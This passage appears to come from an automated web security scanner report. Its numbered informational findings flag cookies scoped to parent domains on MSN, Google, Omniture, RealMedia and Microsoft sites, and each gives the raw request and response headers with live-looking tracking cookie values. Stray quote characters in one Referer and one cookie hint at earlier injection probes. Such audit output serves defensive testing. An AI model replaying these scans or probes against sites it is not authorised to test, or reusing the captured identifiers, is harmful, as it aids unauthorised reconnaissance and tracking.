Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: THTR=IPP=5; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: MC1=V=3&GUID=77c136239add4ff1b69507318edbbcf5; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: wba22
Date: Wed, 02 Feb 2011 15:35:42 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fshowtimes%2f%3f">here</a>.</h2>
</body></html>

11.131. http://movies.msn.com/the-rundown/the-guard/story_5/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/the-rundown/the-guard/story_5/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=d3e5f9ccee7f4c1b92909d2eb7b20019; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /the-rundown/the-guard/story_5/ HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.132. http://mt2.google.com/mapstt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mt2.google.com
Path:	/mapstt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=2f567065d3d0c97c:TM=1296661082:LM=1296661082:S=1EC8GjHZm3yxooIH; expires=Fri, 01-Feb-2013 15:38:02 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mapstt HTTP/1.1
Host: mt2.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=2f567065d3d0c97c:TM=1296661082:LM=1296661082:S=1EC8GjHZm3yxooIH; expires=Fri, 01-Feb-2013 15:38:02 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 15:38:02 GMT
Server: Traffic Tile Server/1.0
Content-Length: 1350
X-XSS-Protection: 1; mode=block
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>400 Bad Request</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {f
...[SNIP]...

11.133. http://mt3.google.com/mapstt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mt3.google.com
Path:	/mapstt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=a0a6b72d8073021b:TM=1296661083:LM=1296661083:S=vTLxe1z0Inmp5tnZ; expires=Fri, 01-Feb-2013 15:38:03 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mapstt HTTP/1.1
Host: mt3.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a0a6b72d8073021b:TM=1296661083:LM=1296661083:S=vTLxe1z0Inmp5tnZ; expires=Fri, 01-Feb-2013 15:38:03 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 15:38:03 GMT
Server: Traffic Tile Server/1.0
Content-Length: 1350
X-XSS-Protection: 1; mode=block
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>400 Bad Request</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {f
...[SNIP]...

11.134. http://music.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://music.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=76b0d6e8fdae4428a122c2611de28248; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: music.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.135. http://music.msn.com/music/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://music.msn.com
Path:	/music/article.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=2cce766a6a6f473ba30e694c272dcc30; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /music/article.aspx?news=626003&gt1=28102 HTTP/1.1
Host: music.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.136. http://my.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=a084dcc2b5364191ad936bfe59f51c19; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: my.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 15:38:07 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPMYREN05
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661087&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.msn.com%2f&lc=1033&id=254014
Set-Cookie: MC1=V=3&GUID=a084dcc2b5364191ad936bfe59f51c19; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 287

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661087&rver=5.5.4177.0&wp=mbi&wrep
...[SNIP]...

11.137. http://my.omniture.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.omniture.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

sc_locale=en_US; expires=Wed, 16-Mar-2011 10:59:51 GMT; path=/; domain=.omniture.com
sc_locale_numbers=en_US; expires=Wed, 16-Mar-2011 10:59:51 GMT; path=/; domain=.omniture.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: my.omniture.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sq=%5B%5BB%5D%5D; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 18:59:50 GMT
Server: Omniture AWS/2.0.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV STA COM"
Set-Cookie: sc_locale=en_US; expires=Wed, 16-Mar-2011 10:59:51 GMT; path=/; domain=.omniture.com
Set-Cookie: sc_locale_numbers=en_US; expires=Wed, 16-Mar-2011 10:59:51 GMT; path=/; domain=.omniture.com
Location: https://my.omniture.com/login/
xserver: www446
Content-Length: 0
Content-Type: text/html

11.138. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Lendingtree/Retargeting_Homepage_Nonsecure@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_nx.ads/TRACK_Lendingtree/Retargeting_Homepage_Nonsecure@Bottom3

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

RMFL=011PkerqU10EfJ|U10Eo1|U1014lt|U10166E|U1016Pl; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NXCLICK2=011PkerqNX_TRACK_Lendingtree/Retargeting_Homepage_Nonsecure!y!B3!16Pl!1MTwg; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_nx.ads/TRACK_Lendingtree/Retargeting_Homepage_Nonsecure@Bottom3 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://offers.lendingtree.com/splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjwfWO1016Kj

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 15:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFL=011PkerqU10EfJ|U10Eo1|U1014lt|U10166E|U1016Pl; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
Set-Cookie: NXCLICK2=011PkerqNX_TRACK_Lendingtree/Retargeting_Homepage_Nonsecure!y!B3!16Pl!1MTwg; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
Location: http://imagen01.247realmedia.com/RealMedia/ads/Creatives/USNetwork/BCN2010120164_000a_LendingTree/Trans1x1.gif
Content-Length: 382
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Wed, 02-Feb-2011 07:34:34 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://imagen01.247realmedia.com/RealMedia/ads/
...[SNIP]...

11.139. http://news.google.com/news/story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.google.com
Path:	/news/story

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=43=GXaQe0GsXSV2YMSlBA1weWXdbGb15vVVlvEjxw-azfhKz5Y52B5o0wuK-hj7O8rvaVqgnR9MmAW3O13Tp34qRtoN4u9bGdTZBGBFU_hRFJ0AuMgjokowzdvpdwT7l3CI;Domain=.google.com;Path=/;Expires=Wed, 03-Aug-2011 15:37:00 GMT;HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/story HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=GXaQe0GsXSV2YMSlBA1weWXdbGb15vVVlvEjxw-azfhKz5Y52B5o0wuK-hj7O8rvaVqgnR9MmAW3O13Tp34qRtoN4u9bGdTZBGBFU_hRFJ0AuMgjokowzdvpdwT7l3CI;Domain=.google.com;Path=/;Expires=Wed, 03-Aug-2011 15:37:00 GMT;HttpOnly
Location: /news?pz=1&hl=en&ned=us
Date: Tue, 01 Feb 2011 15:37:00 GMT
Expires: Tue, 01 Feb 2011 15:37:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/news?pz=1&hl=en&ned=us">here</A>.
</B
...[SNIP]...

11.140. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omniture.d1.sc.omtrdc.net
Path:	/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAC[CE]; Expires=Mon, 1 Feb 2016 19:21:16 GMT; Domain=.omtrdc.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697 HTTP/1.1
Host: omniture.d1.sc.omtrdc.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A4BD650507A9BE-60000103A0064D41[CE];

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 19:21:16 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAC[CE]; Expires=Mon, 1 Feb 2016 19:21:16 GMT; Domain=.omtrdc.net; Path=/
Location: http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Tue, 01 Feb 2011 19:21:16 GMT
Last-Modified: Thu, 03 Feb 2011 19:21:16 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www1
Content-Length: 0
Content-Type: text/plain
Connection: close

11.141. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omniture.d1.sc.omtrdc.net
Path:	/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAC[CE]; Expires=Mon, 1 Feb 2016 19:21:16 GMT; Domain=.omtrdc.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358 HTTP/1.1
Host: omniture.d1.sc.omtrdc.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A4BD650507A9BE-60000103A0064D41[CE];

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 19:21:16 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAC[CE]; Expires=Mon, 1 Feb 2016 19:21:16 GMT; Domain=.omtrdc.net; Path=/
Location: http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Tue, 01 Feb 2011 19:21:16 GMT
Last-Modified: Thu, 03 Feb 2011 19:21:16 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www30
Content-Length: 0
Content-Type: text/plain
Connection: close

11.142. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s21560784257017 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omniture.d1.sc.omtrdc.net
Path:	/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s21560784257017

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAD[CE]; Expires=Mon, 1 Feb 2016 19:21:17 GMT; Domain=.omtrdc.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s21560784257017 HTTP/1.1
Host: omniture.d1.sc.omtrdc.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A4BD650507A9BE-60000103A0064D41[CE];

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 19:21:17 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAD[CE]; Expires=Mon, 1 Feb 2016 19:21:17 GMT; Domain=.omtrdc.net; Path=/
Location: http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s21560784257017?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Tue, 01 Feb 2011 19:21:17 GMT
Last-Modified: Thu, 03 Feb 2011 19:21:17 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www27
Content-Length: 0
Content-Type: text/plain
Connection: close

11.143. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23100360115058 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omniture.d1.sc.omtrdc.net
Path:	/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23100360115058

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAE[CE]; Expires=Mon, 1 Feb 2016 19:21:18 GMT; Domain=.omtrdc.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23100360115058 HTTP/1.1
Host: omniture.d1.sc.omtrdc.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A4BD650507A9BE-60000103A0064D41[CE];

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 19:21:18 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAE[CE]; Expires=Mon, 1 Feb 2016 19:21:18 GMT; Domain=.omtrdc.net; Path=/
Location: http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23100360115058?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Tue, 01 Feb 2011 19:21:18 GMT
Last-Modified: Thu, 03 Feb 2011 19:21:18 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www19
Content-Length: 0
Content-Type: text/plain
Connection: close

11.144. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23355576898902 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omniture.d1.sc.omtrdc.net
Path:	/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23355576898902

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAD[CE]; Expires=Mon, 1 Feb 2016 19:21:17 GMT; Domain=.omtrdc.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23355576898902 HTTP/1.1
Host: omniture.d1.sc.omtrdc.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A4BD650507A9BE-60000103A0064D41[CE];

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 19:21:17 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAD[CE]; Expires=Mon, 1 Feb 2016 19:21:17 GMT; Domain=.omtrdc.net; Path=/
Location: http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23355576898902?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Tue, 01 Feb 2011 19:21:17 GMT
Last-Modified: Thu, 03 Feb 2011 19:21:17 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www25
Content-Length: 0
Content-Type: text/plain
Connection: close

11.145. https://omniturebanners.112.2o7.net/b/ss/omniturebanners/1/H.9--NS/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://omniturebanners.112.2o7.net
Path:	/b/ss/omniturebanners/1/H.9--NS/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|0-0|4D49AEAF[CE]; Expires=Mon, 1 Feb 2016 19:21:19 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/omniturebanners/1/H.9--NS/0 HTTP/1.1
Host: omniturebanners.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.146. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/bing/ff808490.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A=I&I=AxUFAAAAAADvBwAAMWItHgFApdkzxQaDuho8RA!!&M=1; domain=.microsoft.com; expires=Sat, 02-Feb-2041 15:38:20 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/bing/ff808490.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAADvBwAAMWItHgFApdkzxQaDuho8RA!!&M=1; domain=.microsoft.com; expires=Sat, 02-Feb-2041 15:38:20 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Sat, 02-Feb-2041 15:38:20 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 15:38:19 GMT
Content-Length: 34741

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

11.147. http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/msn/thebasics.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A=I&I=AxUFAAAAAAB9BwAAv+cg4N9BcsGpzhmgViEJWQ!!&M=1; domain=.microsoft.com; expires=Sat, 02-Feb-2041 15:38:20 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/thebasics.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAB9BwAAv+cg4N9BcsGpzhmgViEJWQ!!&M=1; domain=.microsoft.com; expires=Sat, 02-Feb-2041 15:38:20 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Sat, 02-Feb-2041 15:38:20 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 15:38:19 GMT
Content-Length: 21044

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
